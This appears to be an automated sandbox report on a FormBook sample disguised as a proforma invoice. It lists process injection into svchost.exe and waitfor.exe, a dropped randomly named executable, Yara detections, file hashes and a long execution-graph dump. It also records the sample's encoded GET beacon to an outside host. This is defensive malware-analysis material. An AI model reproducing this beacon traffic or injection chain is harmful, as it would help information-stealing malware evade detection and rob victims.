                                                                                                                   48 | 192.168.2.5 | 50024 | 172.67.167.146 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   Dec 2, 2024 15:26:53.704754114 CET | 502 | OUT | GET /8gp4/?bV=FEeZWlhMd48ysDs290a5kdk4wKu/Usks8a8x1+EEc0Vq+hoQB7y77HQo5oow9pdvGKqyyoz5OAo+pUm014OHEU2GNEJ4iSl/EJTCwnsfNhVKTNH/IB8Mre+zSk1Y9E9ALA==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.rgenerousrs.store
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                   Dec 2, 2024 15:26:55.200845957 CET | 1118 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:55 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEc2f3RJZfHySdKuuKhrzrNmxVGOIJAoIJyqvgP%2Bmxeylgr%2BltjfD%2BMdg5J7HcRCQaW5EwPAMf34fJLufWrUzS5PUU1pZg6tnFDhp%2BjiwQ0kvtj6eSHQQkhv3%2FDLTrcJED5LFQDk%2F7g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ebbfea3fa417d24-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1790&rtt_var=895&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=502&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0


                                                                                                                  Target ID:0
                                                                                                                  Start time:09:22:53
                                                                                                                  Start date:02/12/2024
                                                                                                                  Path:C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe"
                                                                                                                  Imagebase:0x250000
                                                                                                                  File size:1'207'808 bytes
                                                                                                                  MD5 hash:A4C3A56E6258EA94065BF7151009D43C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:09:22:53
                                                                                                                  Start date:02/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe"
                                                                                                                  Imagebase:0x600000
                                                                                                                  File size:46'504 bytes
                                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2298090586.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:09:23:14
                                                                                                                  Start date:02/12/2024
                                                                                                                  Path:C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe"
                                                                                                                  Imagebase:0x30000
                                                                                                                  File size:140'800 bytes
                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:5
                                                                                                                  Start time:09:23:16
                                                                                                                  Start date:02/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\waitfor.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\SysWOW64\waitfor.exe"
                                                                                                                  Imagebase:0xfc0000
                                                                                                                  File size:32'768 bytes
                                                                                                                  MD5 hash:E58E152B44F20DD099C5105DE482DF24
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4469517194.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
Has exited:false

Target ID:6
Start time:09:23:29
Start date:02/12/2024
Path:C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe"
Imagebase:0x30000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:8
Start time:09:23:41
Start date:02/12/2024
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:0x7ff79f9e0000
File size:676'768 bytes
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true


Execution Graph

Execution Coverage:3.5%
Dynamic/Decrypted Code Coverage:0.4%
Signature Coverage:10%
Total number of Nodes:2000
Total number of Limit Nodes:166
2883aa 101988->101967 101991 2883c8 101989->101991 101990->101978 101990->101980 101990->101981 101990->101983 101990->101986 101990->101987 101990->101988 101992 278b28 __cftoa_l 58 API calls 101991->101992 101992->101975 101993->101910 101994->101915 101995->101915 101997 254b83 101996->101997 101998 254c3f LoadLibraryA 101996->101998 101997->101796 101997->101799 101998->101997 101999 254c50 GetProcAddress 101998->101999 101999->101997 102001 270db6 Mailbox 59 API calls 102000->102001 102002 255240 102001->102002 102002->101804 102004 254ea3 FindResourceExW 102003->102004 102005 254ec0 102003->102005 102004->102005 102006 28d933 LoadResource 102004->102006 102005->101805 102006->102005 102007 28d948 SizeofResource 102006->102007 102007->102005 102008 28d95c LockResource 102007->102008 102008->102005 102010 254ef4 102009->102010 102011 28d9ab 102009->102011 102015 27584d 102010->102015 102013 254f02 102013->101816 102014->101805 102016 275859 __getstream 102015->102016 102017 27586b 102016->102017 102019 275891 102016->102019 102028 278b28 58 API calls __getptd_noexit 102017->102028 102030 276c11 102019->102030 102021 275870 102029 278db6 9 API calls __cftoa_l 102021->102029 102022 275897 102036 2757be 83 API calls 5 library calls 102022->102036 102025 2758a6 102037 2758c8 LeaveCriticalSection LeaveCriticalSection _fprintf 102025->102037 102027 27587b __getstream 102027->102013 102028->102021 102029->102027 102031 276c43 EnterCriticalSection 102030->102031 102032 276c21 102030->102032 102034 276c39 102031->102034 102032->102031 102033 276c29 102032->102033 102035 279c0b __lock 58 API calls 102033->102035 102034->102022 102035->102034 102036->102025 102037->102027 102041 2755fd 102038->102041 102040 254f2e 102040->101824 102042 275609 __getstream 102041->102042 102043 27561f _memset 102042->102043 102044 27564c 102042->102044 102045 275644 __getstream 102042->102045 102054 278b28 58 API calls __getptd_noexit 102043->102054 102046 276c11 __lock_file 59 API calls 
102044->102046 102045->102040 102047 275652 102046->102047 102056 27541d 72 API calls 6 library calls 102047->102056 102050 275639 102055 278db6 9 API calls __cftoa_l 102050->102055 102051 275668 102057 275686 LeaveCriticalSection LeaveCriticalSection _fprintf 102051->102057 102054->102050 102055->102045 102056->102051 102057->102045 102061 27520a GetSystemTimeAsFileTime 102058->102061 102060 2b8f6e 102060->101826 102062 275238 __aulldiv 102061->102062 102062->102060 102064 275c6c __getstream 102063->102064 102065 275c93 102064->102065 102066 275c7e 102064->102066 102068 276c11 __lock_file 59 API calls 102065->102068 102077 278b28 58 API calls __getptd_noexit 102066->102077 102070 275c99 102068->102070 102069 275c83 102078 278db6 9 API calls __cftoa_l 102069->102078 102079 2758d0 67 API calls 6 library calls 102070->102079 102073 275ca4 102080 275cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 102073->102080 102075 275cb6 102076 275c8e __getstream 102075->102076 102076->101831 102077->102069 102078->102076 102079->102073 102080->102075 102081->101684 102082->101692 102083->101705 102084->101707 102085->101704 102086->101713 102088 259169 Mailbox 102087->102088 102089 28f19f 102088->102089 102094 259173 102088->102094 102090 270db6 Mailbox 59 API calls 102089->102090 102091 28f1ab 102090->102091 102092 25917a 102092->101718 102094->102092 102095 259c90 59 API calls Mailbox 102094->102095 102095->102094 102096->101728 102097->101723 102103 2b9748 __tzset_nolock _wcscmp 102098->102103 102099 254f0b 74 API calls 102099->102103 102100 2b95dc 102100->101734 102100->101761 102101 2b9109 GetSystemTimeAsFileTime 102101->102103 102102 254ee5 85 API calls 102102->102103 102103->102099 102103->102100 102103->102101 102103->102102 102104->101760 102106 2753b2 __getstream 102105->102106 102107 2753c6 102106->102107 102108 2753de 102106->102108 102134 278b28 58 API calls __getptd_noexit 102107->102134 102111 276c11 __lock_file 59 API calls 102108->102111 102114 2753d6 
__getstream 102108->102114 102110 2753cb 102135 278db6 9 API calls __cftoa_l 102110->102135 102113 2753f0 102111->102113 102118 27533a 102113->102118 102114->101769 102119 27535d 102118->102119 102120 275349 102118->102120 102132 275359 102119->102132 102137 274a3d 102119->102137 102180 278b28 58 API calls __getptd_noexit 102120->102180 102122 27534e 102181 278db6 9 API calls __cftoa_l 102122->102181 102129 275377 102154 280a02 102129->102154 102131 27537d 102131->102132 102133 272d55 _free 58 API calls 102131->102133 102136 275415 LeaveCriticalSection LeaveCriticalSection _fprintf 102132->102136 102133->102132 102134->102110 102135->102114 102136->102114 102138 274a50 102137->102138 102142 274a74 102137->102142 102139 2746e6 __output_l 58 API calls 102138->102139 102138->102142 102140 274a6d 102139->102140 102182 27d886 102140->102182 102143 280b77 102142->102143 102144 275371 102143->102144 102145 280b84 102143->102145 102147 2746e6 102144->102147 102145->102144 102146 272d55 _free 58 API calls 102145->102146 102146->102144 102148 274705 102147->102148 102149 2746f0 102147->102149 102148->102129 102317 278b28 58 API calls __getptd_noexit 102149->102317 102151 2746f5 102318 278db6 9 API calls __cftoa_l 102151->102318 102153 274700 102153->102129 102155 280a0e __getstream 102154->102155 102156 280a1b 102155->102156 102157 280a32 102155->102157 102334 278af4 58 API calls __getptd_noexit 102156->102334 102159 280abd 102157->102159 102162 280a42 102157->102162 102339 278af4 58 API calls __getptd_noexit 102159->102339 102161 280a20 102335 278b28 58 API calls __getptd_noexit 102161->102335 102163 280a6a 102162->102163 102164 280a60 102162->102164 102168 27d206 ___lock_fhandle 59 API calls 102163->102168 102336 278af4 58 API calls __getptd_noexit 102164->102336 102165 280a65 102340 278b28 58 API calls __getptd_noexit 102165->102340 102171 280a70 102168->102171 102169 280a27 __getstream 102169->102131 102173 280a8e 102171->102173 102174 280a83 102171->102174 102172 280ac9 
102341 278db6 9 API calls __cftoa_l 102172->102341 102337 278b28 58 API calls __getptd_noexit 102173->102337 102319 280add 102174->102319 102178 280a89 102338 280ab5 LeaveCriticalSection __unlock_fhandle 102178->102338 102180->102122 102181->102132 102183 27d892 __getstream 102182->102183 102184 27d8b6 102183->102184 102185 27d89f 102183->102185 102187 27d955 102184->102187 102190 27d8ca 102184->102190 102283 278af4 58 API calls __getptd_noexit 102185->102283 102289 278af4 58 API calls __getptd_noexit 102187->102289 102189 27d8a4 102284 278b28 58 API calls __getptd_noexit 102189->102284 102191 27d8f2 102190->102191 102192 27d8e8 102190->102192 102210 27d206 102191->102210 102285 278af4 58 API calls __getptd_noexit 102192->102285 102193 27d8ed 102290 278b28 58 API calls __getptd_noexit 102193->102290 102197 27d8f8 102199 27d91e 102197->102199 102200 27d90b 102197->102200 102286 278b28 58 API calls __getptd_noexit 102199->102286 102219 27d975 102200->102219 102201 27d961 102291 278db6 9 API calls __cftoa_l 102201->102291 102205 27d8ab __getstream 102205->102142 102206 27d917 102288 27d94d LeaveCriticalSection __unlock_fhandle 102206->102288 102207 27d923 102287 278af4 58 API calls __getptd_noexit 102207->102287 102211 27d212 __getstream 102210->102211 102212 27d261 EnterCriticalSection 102211->102212 102214 279c0b __lock 58 API calls 102211->102214 102213 27d287 __getstream 102212->102213 102213->102197 102215 27d237 102214->102215 102218 27d24f 102215->102218 102292 279e2b InitializeCriticalSectionAndSpinCount 102215->102292 102293 27d28b LeaveCriticalSection _doexit 102218->102293 102220 27d982 __write_nolock 102219->102220 102221 27d9c1 102220->102221 102222 27d9e0 102220->102222 102250 27d9b6 102220->102250 102303 278af4 58 API calls __getptd_noexit 102221->102303 102225 27da38 102222->102225 102226 27da1c 102222->102226 102223 27c5f6 __crtLCMapStringA_stat 6 API calls 102227 27e1d6 102223->102227 102230 27da51 102225->102230 102309 2818c1 60 API calls 3 library 
calls 102225->102309 102306 278af4 58 API calls __getptd_noexit 102226->102306 102227->102206 102228 27d9c6 102304 278b28 58 API calls __getptd_noexit 102228->102304 102294 285c6b 102230->102294 102233 27d9cd 102305 278db6 9 API calls __cftoa_l 102233->102305 102235 27da21 102307 278b28 58 API calls __getptd_noexit 102235->102307 102237 27da5f 102239 27ddb8 102237->102239 102310 2799ac 58 API calls 2 library calls 102237->102310 102241 27ddd6 102239->102241 102242 27e14b WriteFile 102239->102242 102240 27da28 102308 278db6 9 API calls __cftoa_l 102240->102308 102245 27defa 102241->102245 102254 27ddec 102241->102254 102246 27ddab GetLastError 102242->102246 102252 27dd78 102242->102252 102257 27df05 102245->102257 102260 27dfef 102245->102260 102246->102252 102247 27da8b GetConsoleMode 102247->102239 102249 27daca 102247->102249 102248 27e184 102248->102250 102315 278b28 58 API calls __getptd_noexit 102248->102315 102249->102239 102253 27dada GetConsoleCP 102249->102253 102250->102223 102252->102248 102252->102250 102259 27ded8 102252->102259 102253->102248 102279 27db09 102253->102279 102254->102248 102255 27de5b WriteFile 102254->102255 102255->102246 102256 27de98 102255->102256 102256->102254 102261 27debc 102256->102261 102257->102248 102262 27df6a WriteFile 102257->102262 102258 27e1b2 102316 278af4 58 API calls __getptd_noexit 102258->102316 102264 27dee3 102259->102264 102265 27e17b 102259->102265 102260->102248 102266 27e064 WideCharToMultiByte 102260->102266 102261->102252 102262->102246 102267 27dfb9 102262->102267 102312 278b28 58 API calls __getptd_noexit 102264->102312 102314 278b07 58 API calls 3 library calls 102265->102314 102266->102246 102275 27e0ab 102266->102275 102267->102252 102267->102257 102267->102261 102270 27e0b3 WriteFile 102273 27e106 GetLastError 102270->102273 102270->102275 102271 27dee8 102313 278af4 58 API calls __getptd_noexit 102271->102313 102273->102275 102275->102252 102275->102260 102275->102261 102275->102270 102276 2862ba 
60 API calls __write_nolock 102276->102279 102277 27dbf2 WideCharToMultiByte 102277->102252 102278 27dc2d WriteFile 102277->102278 102278->102246 102281 27dc5f 102278->102281 102279->102252 102279->102276 102279->102277 102279->102281 102311 2735f5 58 API calls __isleadbyte_l 102279->102311 102280 287a5e WriteConsoleW CreateFileW __putwch_nolock 102280->102281 102281->102246 102281->102252 102281->102279 102281->102280 102282 27dc87 WriteFile 102281->102282 102282->102246 102282->102281 102283->102189 102284->102205 102285->102193 102286->102207 102287->102206 102288->102205 102289->102193 102290->102201 102291->102205 102292->102218 102293->102212 102295 285c76 102294->102295 102297 285c83 102294->102297 102296 278b28 __cftoa_l 58 API calls 102295->102296 102298 285c7b 102296->102298 102299 285c8f 102297->102299 102300 278b28 __cftoa_l 58 API calls 102297->102300 102298->102237 102299->102237 102301 285cb0 102300->102301 102302 278db6 __cftoa_l 9 API calls 102301->102302 102302->102298 102303->102228 102304->102233 102305->102250 102306->102235 102307->102240 102308->102250 102309->102230 102310->102247 102311->102279 102312->102271 102313->102250 102314->102250 102315->102258 102316->102250 102317->102151 102318->102153 102342 27d4c3 102319->102342 102321 280b41 102355 27d43d 59 API calls 2 library calls 102321->102355 102322 280aeb 102322->102321 102323 280b1f 102322->102323 102325 27d4c3 __close_nolock 58 API calls 102322->102325 102323->102321 102326 27d4c3 __close_nolock 58 API calls 102323->102326 102329 280b16 102325->102329 102330 280b2b CloseHandle 102326->102330 102327 280b49 102328 280b6b 102327->102328 102356 278b07 58 API calls 3 library calls 102327->102356 102328->102178 102332 27d4c3 __close_nolock 58 API calls 102329->102332 102330->102321 102333 280b37 GetLastError 102330->102333 102332->102323 102333->102321 102334->102161 102335->102169 102336->102165 102337->102178 102338->102169 102339->102165 102340->102172 102341->102169 102343 27d4e3 
102342->102343 102344 27d4ce 102342->102344 102349 27d508 102343->102349 102359 278af4 58 API calls __getptd_noexit 102343->102359 102357 278af4 58 API calls __getptd_noexit 102344->102357 102346 27d4d3 102358 278b28 58 API calls __getptd_noexit 102346->102358 102349->102322 102350 27d512 102360 278b28 58 API calls __getptd_noexit 102350->102360 102351 27d4db 102351->102322 102353 27d51a 102361 278db6 9 API calls __cftoa_l 102353->102361 102355->102327 102356->102328 102357->102346 102358->102351 102359->102350 102360->102353 102361->102351 102424 281940 102362->102424 102365 25477c 102367 257bcc 59 API calls 102365->102367 102366 254799 102430 257d8c 102366->102430 102369 254788 102367->102369 102426 257726 102369->102426 102372 270791 102373 27079e __write_nolock 102372->102373 102374 27079f GetLongPathNameW 102373->102374 102375 257bcc 59 API calls 102374->102375 102376 2572bd 102375->102376 102377 25700b 102376->102377 102378 257667 59 API calls 102377->102378 102379 25701d 102378->102379 102380 254750 60 API calls 102379->102380 102381 257028 102380->102381 102382 257033 102381->102382 102386 28e885 102381->102386 102383 253f74 59 API calls 102382->102383 102385 25703f 102383->102385 102438 2534c2 102385->102438 102387 28e89f 102386->102387 102444 257908 61 API calls 102386->102444 102389 257052 Mailbox 102389->101490 102391 254ddd 136 API calls 102390->102391 102392 25688f 102391->102392 102393 28e031 102392->102393 102394 254ddd 136 API calls 102392->102394 102395 2b955b 122 API calls 102393->102395 102396 2568a3 102394->102396 102397 28e046 102395->102397 102396->102393 102398 2568ab 102396->102398 102399 28e04a 102397->102399 102400 28e067 102397->102400 102402 2568b7 102398->102402 102403 28e052 102398->102403 102404 254e4a 84 API calls 102399->102404 102401 270db6 Mailbox 59 API calls 102400->102401 102423 28e0ac Mailbox 102401->102423 102445 256a8c 102402->102445 102552 2b42f8 90 API calls _wprintf 102403->102552 102404->102403 102408 28e060 
102408->102400 102409 28e260 102410 272d55 _free 58 API calls 102409->102410 102411 28e268 102410->102411 102412 254e4a 84 API calls 102411->102412 102417 28e271 102412->102417 102416 272d55 _free 58 API calls 102416->102417 102417->102416 102418 254e4a 84 API calls 102417->102418 102556 2af7a1 89 API calls 4 library calls 102417->102556 102418->102417 102420 257de1 59 API calls 102420->102423 102423->102409 102423->102417 102423->102420 102538 25750f 102423->102538 102546 25735d 102423->102546 102553 2af73d 59 API calls 2 library calls 102423->102553 102554 2af65e 61 API calls 2 library calls 102423->102554 102555 2b737f 59 API calls Mailbox 102423->102555 102425 25475d GetFullPathNameW 102424->102425 102425->102365 102425->102366 102427 257734 102426->102427 102434 257d2c 102427->102434 102429 254794 102429->102372 102431 257da6 102430->102431 102433 257d99 102430->102433 102432 270db6 Mailbox 59 API calls 102431->102432 102432->102433 102433->102369 102435 257d3a 102434->102435 102437 257d43 _memmove 102434->102437 102436 257e4f 59 API calls 102435->102436 102435->102437 102436->102437 102437->102429 102439 2534d4 102438->102439 102443 2534f3 _memmove 102438->102443 102441 270db6 Mailbox 59 API calls 102439->102441 102440 270db6 Mailbox 59 API calls 102442 25350a 102440->102442 102441->102443 102442->102389 102443->102440 102444->102386 102446 256ab5 102445->102446 102447 28e41e 102445->102447 102562 2557a6 60 API calls Mailbox 102446->102562 102629 2af7a1 89 API calls 4 library calls 102447->102629 102450 256ad7 102563 2557f6 67 API calls 102450->102563 102451 28e431 102630 2af7a1 89 API calls 4 library calls 102451->102630 102453 256aec 102453->102451 102455 256af4 102453->102455 102457 257667 59 API calls 102455->102457 102456 28e44d 102459 256b61 102456->102459 102458 256b00 102457->102458 102564 270957 60 API calls __write_nolock 102458->102564 102461 28e460 102459->102461 102462 256b6f 102459->102462 102465 255c6f CloseHandle 102461->102465 102466 257667 
59 API calls 102462->102466 102463 256b0c 102464 257667 59 API calls 102463->102464 102467 256b18 102464->102467 102468 28e46c 102465->102468 102469 256b78 102466->102469 102470 254750 60 API calls 102467->102470 102471 254ddd 136 API calls 102468->102471 102472 257667 59 API calls 102469->102472 102473 256b26 102470->102473 102474 28e488 102471->102474 102475 256b81 102472->102475 102565 255850 ReadFile SetFilePointerEx 102473->102565 102477 28e4b1 102474->102477 102481 2b955b 122 API calls 102474->102481 102567 25459b 102475->102567 102631 2af7a1 89 API calls 4 library calls 102477->102631 102480 256b52 102566 255aee SetFilePointerEx SetFilePointerEx 102480->102566 102485 28e4a4 102481->102485 102482 256b98 102486 257b2e 59 API calls 102482->102486 102483 28e4c8 102493 256d0c Mailbox 102483->102493 102488 28e4ac 102485->102488 102489 28e4cd 102485->102489 102487 256ba9 SetCurrentDirectoryW 102486->102487 102495 256bbc Mailbox 102487->102495 102491 254e4a 84 API calls 102488->102491 102490 254e4a 84 API calls 102489->102490 102492 28e4d2 102490->102492 102491->102477 102494 270db6 Mailbox 59 API calls 102492->102494 102557 2557d4 102493->102557 102501 28e506 102494->102501 102497 270db6 Mailbox 59 API calls 102495->102497 102499 256bcf 102497->102499 102498 253bbb 102498->101357 102498->101380 102500 25522e 59 API calls 102499->102500 102527 256bda Mailbox __NMSG_WRITE 102500->102527 102502 25750f 59 API calls 102501->102502 102522 28e54f Mailbox 102502->102522 102503 256ce7 102625 255c6f 102503->102625 102506 28e740 102636 2b72df 59 API calls Mailbox 102506->102636 102507 256cf3 SetCurrentDirectoryW 102507->102493 102510 28e762 102637 2cfbce 59 API calls 2 library calls 102510->102637 102513 28e76f 102515 272d55 _free 58 API calls 102513->102515 102514 28e7d9 102640 2af7a1 89 API calls 4 library calls 102514->102640 102515->102493 102518 25750f 59 API calls 102518->102522 102519 28e7f2 102519->102503 102521 28e7d1 102639 2af5f7 59 API calls 4 library calls 
102521->102639 102522->102506 102522->102518 102529 257de1 59 API calls 102522->102529 102533 28e792 102522->102533 102632 2af73d 59 API calls 2 library calls 102522->102632 102633 2af65e 61 API calls 2 library calls 102522->102633 102634 2b737f 59 API calls Mailbox 102522->102634 102635 257213 59 API calls Mailbox 102522->102635 102525 257de1 59 API calls 102525->102527 102527->102503 102527->102514 102527->102521 102527->102525 102618 25586d 67 API calls _wcscpy 102527->102618 102619 256f5d GetStringTypeW 102527->102619 102620 256ecc 60 API calls __wcsnicmp 102527->102620 102621 256faa GetStringTypeW __NMSG_WRITE 102527->102621 102622 27363d GetStringTypeW _iswctype 102527->102622 102623 2568dc 165 API calls 3 library calls 102527->102623 102624 257213 59 API calls Mailbox 102527->102624 102529->102522 102638 2af7a1 89 API calls 4 library calls 102533->102638 102535 28e7ab 102536 272d55 _free 58 API calls 102535->102536 102537 28e7be 102536->102537 102537->102493 102539 2575af 102538->102539 102545 257522 _memmove 102538->102545 102541 270db6 Mailbox 59 API calls 102539->102541 102540 270db6 Mailbox 59 API calls 102542 257529 102540->102542 102541->102545 102543 257552 102542->102543 102544 270db6 Mailbox 59 API calls 102542->102544 102543->102423 102544->102543 102545->102540 102547 257370 102546->102547 102549 25741e 102546->102549 102548 270db6 Mailbox 59 API calls 102547->102548 102551 2573a2 102547->102551 102548->102551 102549->102423 102550 270db6 59 API calls Mailbox 102550->102551 102551->102549 102551->102550 102552->102408 102553->102423 102554->102423 102555->102423 102556->102417 102558 255c6f CloseHandle 102557->102558 102559 2557dc Mailbox 102558->102559 102560 255c6f CloseHandle 102559->102560 102561 2557eb 102560->102561 102561->102498 102562->102450 102563->102453 102564->102463 102565->102480 102566->102459 102568 257667 59 API calls 102567->102568 102569 2545b1 102568->102569 102570 257667 59 API calls 102569->102570 102571 2545b9 
102570->102571 102572 257667 59 API calls 102571->102572 102573 2545c1 102572->102573 102574 257667 59 API calls 102573->102574 102575 2545c9 102574->102575 102576 2545fd 102575->102576 102577 28d4d2 102575->102577 102578 25784b 59 API calls 102576->102578 102579 258047 59 API calls 102577->102579 102580 25460b 102578->102580 102581 28d4db 102579->102581 102582 257d2c 59 API calls 102580->102582 102583 257d8c 59 API calls 102581->102583 102584 254615 102582->102584 102586 254640 102583->102586 102585 25784b 59 API calls 102584->102585 102584->102586 102589 254636 102585->102589 102587 254680 102586->102587 102590 25465f 102586->102590 102600 28d4fb 102586->102600 102641 25784b 102587->102641 102593 257d2c 59 API calls 102589->102593 102591 2579f2 59 API calls 102590->102591 102595 254669 102591->102595 102592 254691 102596 2546a3 102592->102596 102598 258047 59 API calls 102592->102598 102593->102586 102594 28d5cb 102597 257bcc 59 API calls 102594->102597 102595->102587 102601 25784b 59 API calls 102595->102601 102599 2546b3 102596->102599 102602 258047 59 API calls 102596->102602 102606 28d588 102597->102606 102598->102596 102604 2546ba 102599->102604 102605 258047 59 API calls 102599->102605 102600->102594 102603 28d5b4 102600->102603 102609 28d532 102600->102609 102601->102587 102602->102599 102603->102594 102611 28d59f 102603->102611 102607 258047 59 API calls 102604->102607 102615 2546c1 Mailbox 102604->102615 102605->102604 102606->102587 102608 2579f2 59 API calls 102606->102608 102654 257924 59 API calls 2 library calls 102606->102654 102607->102615 102608->102606 102610 28d590 102609->102610 102616 28d57b 102609->102616 102612 257bcc 59 API calls 102610->102612 102613 257bcc 59 API calls 102611->102613 102612->102606 102613->102606 102615->102482 102617 257bcc 59 API calls 102616->102617 102617->102606 102618->102527 102619->102527 102620->102527 102621->102527 102622->102527 102623->102527 102624->102527 102626 255c79 102625->102626 102627 255c88 
102625->102627 102626->102507 102627->102626 102628 255c8d CloseHandle 102627->102628 102628->102626 102629->102451 102630->102456 102631->102483 102632->102522 102633->102522 102634->102522 102635->102522 102636->102510 102637->102513 102638->102535 102639->102514 102640->102519 102642 2578b7 102641->102642 102643 25785a 102641->102643 102644 257d2c 59 API calls 102642->102644 102643->102642 102645 257865 102643->102645 102646 257888 _memmove 102644->102646 102647 28eb09 102645->102647 102648 257880 102645->102648 102646->102592 102656 258029 102647->102656 102655 257f27 59 API calls Mailbox 102648->102655 102651 28eb13 102652 270db6 Mailbox 59 API calls 102651->102652 102653 28eb33 102652->102653 102654->102606 102655->102646 102657 270db6 Mailbox 59 API calls 102656->102657 102658 258033 102657->102658 102658->102651 102659->101501 102661 256d95 102660->102661 102666 256ea9 102660->102666 102662 270db6 Mailbox 59 API calls 102661->102662 102661->102666 102664 256dbc 102662->102664 102663 270db6 Mailbox 59 API calls 102670 256e31 102663->102670 102664->102663 102666->101505 102668 25735d 59 API calls 102668->102670 102669 25750f 59 API calls 102669->102670 102670->102666 102670->102668 102670->102669 102673 256240 102670->102673 102698 2a6553 59 API calls Mailbox 102670->102698 102671->101507 102672->101509 102699 257a16 102673->102699 102675 25646a 102676 25750f 59 API calls 102675->102676 102683 256484 Mailbox 102676->102683 